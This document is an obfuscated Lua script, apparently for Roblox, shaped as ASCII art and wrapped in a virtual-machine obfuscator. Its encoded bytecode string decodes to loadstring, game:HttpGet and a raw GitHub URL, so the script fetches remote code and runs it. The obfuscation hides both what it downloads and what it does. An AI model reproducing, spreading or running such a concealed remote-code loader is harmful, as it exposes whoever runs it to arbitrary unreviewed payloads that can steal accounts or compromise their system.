                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v82=v2(v0(v30,16));if v19 then local v92=v5(v82,v19);v19=nil;    
                                                  return v92;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=0 - 
                                                  0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(((3 + 0) -1)^(v32-(2 -1))))%(2^(((v33-(( 
                                                883 -263) -(555 + (1129 -(68 + 997))))) -(v32-((2202 -(226 + 1044)) -(857 + 74)))) + (569 -(367 + 201)) 
                                                )) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v85 
                                               + v85))>=v85) and ((3823 -2945) -((399 -(32 + 85)) + 595))) or (1637 -(1523 + 114)) ;end end local function  
                                              v21() local v34=0 + 0 ;local v35;while true do if (v34==(1 + (0 -0))) then return v35;end if (v34==(957 -(892 
                                             + 65))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=2 -1 ;end end end local function v22() local v36,v37=v1(v16,   
                                            v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23()    
                                          local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (41190819 - 
                                          24413603)) + (v41 * 65536) + (v40 * (189 + 67)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -( 
                                          802 + 150)) );v18=v18 + (10 -6) ;v38=1 -0 ;end end end local function v24() local v43=997 -(915 + 82) ;local v44;local v45; 
                                          local v46;local v47;local v48;local v49;while true do if (v43==(0 -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==((2 
                                         + 1) -(0 -0))) then if (v48==(1187 -(1069 + 118))) then if (v47==(0 -0)) then return v49 * (0 -0) ;else v48=4 -3 ;v46=(0 -0) + 
                                         0 ;end elseif (v48==((30 + 3606) -1589)) then return ((v47==(0 -0))  --[[==============================]]and (v49 * ((3 -2)/0))) 
                                         or (v49 * NaN) ;end return v8(v49,v48-(1015 + 8) ) * (v46  --[[============================================]]+ (v47/((4 -2)^(843 
                                         -(368 + 423))))) ;end if (v43==((5 + 1) -4)) then v48= --[[======================================================]]v20(v45,39 -(10 
                                       + 8) ,119 -88 );v49=((v20(v45,474 -(416 + 26) )==(3  --[[==========================================================]]-2)) and  -(1424  
                                      -(630 + 793))) or (3 -2) ;v43=2 + 1 ;end if (v43==( --[[==============================================================]]1 + 0)) then    
                                      v46=3 -2 ;v47=(v20(v45,1 -0 ,20) * ((1915 -(1789 +  --[[================================================================]](1179 -(87 +    
                                      968))))^((2068 -1598) -(145 + 293)))) + v44 ;v43=   --[[==================================================================]]432 -(44 +    
                                      386) ;end end end local function v25(v50) local v51 --[[==================================================================]]=0 + 0 ;local     
                                    v52;local v53;while true do if (v51==2) then v53={};  --[[====================================================================]]for v93=2 -1  
                    , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=1416 -((984 -537)  --[[====================================================================]]+ 966) ;end if  
              (v51==(0 -0)) then v52=nil;if  not v50 then v50=v23();if (v50==(1817 -(1703 --[[======================================================================]] + 114)))     
            then return "";end end v51=(716 -(9 + 5)) -(376 + (701 -(85 + 291))) ;end if  --[[======================================================================]](v51==3) then 
           return v6(v53);end if (v51==(1 -0)) then v52=v3(v16,v18,(v18 + v50) -(2 -1) ); --[[======================================================================]]v18=v18 + v50 
         ;v51=1 + 1 ;end end end local v26=v23;local function v27(...) return {...},v12(  --[[======================================================================]]"#",...);end  
        local function v28() local v54=(function() return 0 -0 ;end)();local v55=(        --[[======================================================================]]function()    
      return;end)();local v56=(function() return;end)();local v57=(function() return;end) --[[======================================================================]]();local v58= 
      (function() return;end)();local v59=(function() return;end)();local v60=(function()   --[[==================================================================]]return;end)();  
      while true do if (v54== #"/") then local v88=(function() return 0 + 0 ;end)();local   --[[================================================================]]v89=(function()   
    return;end)();while true do if (v88==(529 -(406 + 123))) then v89=(function() return 0  --[[==============================================================]]+ 0 ;end)();while 
     true do if (v89~=(2 -0)) then else v54=(function() return 1 + 1 ;end)();break;end if (   --[[==========================================================]]v89~=(1 -0)) then   
    else for v114= #"\\",v59 do local v115=(function() return 0 + 0 ;end)();local v116=(        --[[====================================================]]function() return;end)( 
    );local v117=(function() return;end)();local v118=(function() return;end)();while true do if  --[[==============================================]]((1146 -(466 + 679))==    
    v115) then v118=(function() return nil;end)();while true do if (v116==(1385 -(746 + 638))) then   --[[====================================]]if (v117== #".") then v118=(  
    function() return v21()~=(0 -0) ;end)();elseif (v117==(1 + 1)) then v118=(function() return v24();end --[[========================]])();elseif (v117== #"91(") then v118= 
    (function() return v25();end)();end v60[v114]=(function() return v118;end)();break;end if (v116~=(0 -0)) then else local v159=(function() return 341 -(218 + 123) ;end) 
  ();while true do if (v159~=(1581 -(1535 + 46))) then else v117=(function() return v21();end)();v118=(function() return nil;end)();v159=(function() return 1 + 0 ;end)() 
  ;end if (v159==(2 -1)) then v116=(function() return 2 -1 ;end)();break;end end end end break;end if (v115==(114 -(4 + 110))) then v116=(function() return 0 + 0 ;end) 
  ();v117=(function() return nil;end)();v115=(function() return 1 + 0 ;end)();end end end v58[ #"-19"]=(function() return v21();end)();v89=(function() return 562 -(306 + 
   254) ;end)();end if (v89==(0 + 0)) then v59=(function() return v23();end)();v60=(function() return {};end)();v89=(function() return 1;end)();end end break;end end end 
   if (v54~=(1 + 1)) then else for v95= #".",v23() do local v96=(function() return v21();end)();if (v20(v96, #"[", #"<")==(0 -0)) then local v105=(function() return 0;   
  end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105==0) then local v110=(      
  function() return 1467 -(899 + 568) ;end)();while true do if (v110==(1 -0)) then v105=(function() return 1;end)();break;end if (v110==0) then local v122=(function()    
  return 0 -0 ;end)();while true do if (v122~=0) then else v106=(function() return v20(v96,2 + 0 , #"gha");end)();v107=(function() return v20(v96, #".com",4 + 2 );end)() 
  ;v122=(function() return 1 -0 ;end)();end if (v122==1) then v110=(function() return 2 -1 ;end)();break;end end end end end if (v105~=(67 -(30 + 35))) then else if (v20 
  (v107, #"[", #"]")~= #"|") then else v108[2]=(function() return v60[v108[605 -(268 + 335) ]];end)();end if (v20(v107,1259 -(1043 + 214) ,292 -(60 + 230) )~= #",") then 
   else v108[ #"xnx"]=(function() return v60[v108[ #"-19"]];end)();end v105=(function() return 3;end)();end if (v105~=(573 -(426 + 146))) then else local v111=(function( 
  ) return 0 + 0 ;end)();local v112=(function() return;end)();while true do if (0~=v111) then else v112=(function() return 0 -0 ;end)();while true do if (v112~=1) then     
  else v105=(function() return 1458 -(282 + 1174) ;end)();break;end if (v112==(811 -(569 + 242))) then local v157=(function() return 320 -(53 + 267) ;end)();while true do  
  if (v157~=(2 -1)) then else v112=(function() return 1;end)();break;end if (v157~=(0 + 0)) then else v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(1251  
  -(721 + 530))) then local v172=(function() return 1271 -(945 + 326) ;end)();local v173=(function() return;end)();while true do if (v172~=(0 -0)) then else v173=(function 
  () return 0 + 0 ;end)();while true do if (v173~=0) then else v108[ #"gha"]=(function() return v22();end)();v108[ #".com"]=(function() return v22();end)();break;end end   
  break;end end elseif (v106== #":") then v108[ #"91("]=(function() return v23();end)();elseif (v106==(7 -5)) then v108[ #"nil"]=(function() return v23() -((702 -(271 +    
  429))^(15 + 1)) ;end)();elseif (v106~= #"-19") then else local v178=(function() return 1500 -(1408 + 92) ;end)();while true do if (v178~=(0 + 0)) then else v108[ #"-19"] 
  =(function() return v23() -((852 -(20 + 830))^(1102 -(461 + 625))) ;end)();v108[ #"asd1"]=(function() return v22();end)();break;end end end v157=(function() return 1;end 
  )();end end end end break;end end end if (v105==3) then if (v20(v107, #"19(", #"91(")== #"/") then v108[ #".dev"]=(function() return v60[v108[ #"0836"]];end)();end v55[  
  v95]=(function() return v108;end)();break;end end end end for v97= #"|",v23() do v56[v97-#":" ]=(function() return v28();end)();end return v58;end if (v54==(1288 -(993 + 
   295))) then local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90==(0 + 0)) then v91=(function() return 126 -(116 + 10) ;end)( 
  );while true do if (v91~=(1172 -(418 + 753))) then else v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v91=(function() return 2;end)(); 
  end if (v91~=(1 + 1)) then else v54=(function() return  #"/";end)();break;end if (v91==0) then v55=(function() return {};end)();v56=(function() return {};end)();v91=(    
  function() return 1 + 0 ;end)();end end break;end end end end end local function v29(v61,v62,v63) local v64=v61[1 -0 ];local v65=v61[(857 -(564 + 292)) + 1 ];local v66 
  =v61[2 + 1 ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1 + 0 ;local v72= -(2 -1);local v73={};local v74={...};local v75=   
  v12("#",...) -(1552 -(1126 + 425)) ;local v76={};local v77={};for v86=405 -(118 + 287) ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + ( 
    3 -2) ];end end local v78=(v75-v69) + (1122 -(118 + 1003)) ;local v79;local v80;while true do local v87=0 -0 ;while true do if (v87==(378 -(142 + 235))) then if ((   
    v80<=7) or (4134<=3926)) then if ((v80<=((21 -8) -(30 -20))) or (164>=2785)) then if (v80<=(1 + 0)) then if (v80>(977 -(553 + 424))) then do return;end else v77[v79[ 
    3 -1 ]]=v63[v79[(307 -(244 + 60)) + 0 ]];end elseif (v80>(2 + 0)) then local v125=0 + 0 ;local v126;while true do if (v125==(0 + 0 + 0)) then v126=v79[478 -(41 + 435 
    ) ];v77[v126]=v77[v126](v13(v77,v126 + 1 + 0 ,v72));break;end end else local v127=v79[4 -2 ];local v128,v129=v70(v77[v127](v13(v77,v127 + (2 -1) ,v79[6 -3 ])));v72=( 
      v129 + v127) -(1 + (1001 -(938 + 63))) ;local v130=0 -0 ;for v151=v127,v72 do v130=v130 + (754 -(239 + 396 + 118)) ;v77[v151]=v128[v130];end end elseif ((v80<=(2 
       + 3)) or (525==2109)) then if ((33==33) and (v80==(1333 -(797 + 532)))) then local v131=(1125 -(936 + 189)) + 0 ;local v132;local v133;while true do if (v131==( 
      0 + 0)) then v132=v79[4 -2 ];v133=v77[v79[1205 -(373 + 829) ]];v131=1;end if (v131==1) then v77[v132 + (732 -(476 + 255)) ]=v133;v77[v132]=v133[v79[1134 -(369 +  
        761) ]];break;end end else v77[v79[2]]();end elseif (v80>(4 + 2)) then v77[v79[1 + 1 ]]=v63[v79[3]];else local v136=v79[2 -0 ];local v137,v138=v70(v77[v136](   
        v13(v77,v136 + 1 ,v79[5 -2 ])));v72=(v138 + v136) -1 ;local v139=0;for v154=v136,v72 do v139=v139 + 1 ;v77[v154]=v137[v139];end end elseif (v80<=(249 -(64 +    
        174))) then if ((3054<=4015) and (v80<=(2 + 7))) then if ((1871<3382) and (v80==(11 -3))) then do return;end else local v140=v79[338 -(144 + 192) ];v77[v140]=  
          v77[v140](v13(v77,v140 + (217 -(42 + 174)) ,v72));end elseif (v80>((1621 -(1565 + 48)) + 2)) then v77[v79[2 + 0 ]]={};else v77[v79[1 + 0 + (1139 -(782 +    
            356)) ]]();end elseif ((1293<=2166) and (v80<=(1517 -(363 + 1141)))) then if ((v80>(1592 -(1183 + 397))) or (2579<123)) then v77[v79[2]]=v79[(275 -(176 + 
               91)) -5 ];else v77[v79[2]]={};end elseif (v80==(11 + 3)) then v77[v79[2 + 0 ]]=v79[1978 -(1913 + 62) ];else local v148=0;local v149;local v150;while   
                true do if (v148==1) then v77[v149 + 1 ]=v150;v77[v149]=v150[v79[3 + 1 ]];break;end if (0==v148) then v149=v79[(13 -8) -(4 -1) ];v150=v77[v79[(3028 - 
                  (975 + 117)) -(565 + 1368) ]];v148=(1878 -(157 + 1718)) -2 ;end end end v71=v71 + (1662 -(1477 + 184)) ;break;end if ((v87==(0 -0)) or (846>=2368 
                      )) then v79=v67[v71];v80=v79[1 + 0 ];v87=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15(                             
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403473Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F736A7369646A642Q6E736E736E732F726570742F726566732F68656164732F6D61696E2F5200094Q000C7Q001207000100013Q001207000200023Q00200400020002000300120E000400044Q0002000200044Q000300013Q00022Q00050001000100012Q00013Q00017Q00",v9(),...);
